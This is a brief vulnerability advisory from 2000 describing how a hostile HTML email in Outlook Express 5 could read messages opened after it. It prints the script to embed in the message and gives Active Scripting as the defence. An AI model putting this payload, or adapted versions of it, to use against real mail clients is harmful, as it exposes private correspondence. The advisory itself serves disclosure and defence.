Outlook Express Object Access

 
Outlook Scripting
Reported February 1, 2000 by Georgio Guninski
VERSIONS AFFECTED
  • Microsoft Outlook Express 5

DESCRIPTION

Outlook Express 5.01 and Internet Explorer 5.01 under Windows 95
(and possibly other versions) allow reading subsequently opened email messages after a hostile message is opened.

The problem is assigning the document object of the email message to a variable in a newly opened window. Thru this variable access is possible to open email messages.

The code that must be included in HTML message is :
-------------------------------------------------
<SCRIPT>
a=window.open("about:<A HREF="javascript:alert(x.body.innerText)" >Click
here to see the active message</A>");
a.x=window.document;
</SCRIPT>
-------------------------------------------------

DEFENSE

Disable Active Scripting

VENDOR RESPONSE

Microsoft is aware of the issue however no response was known at the time of this writing.

CREDITS
Discovered by Georgio Guninski
Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish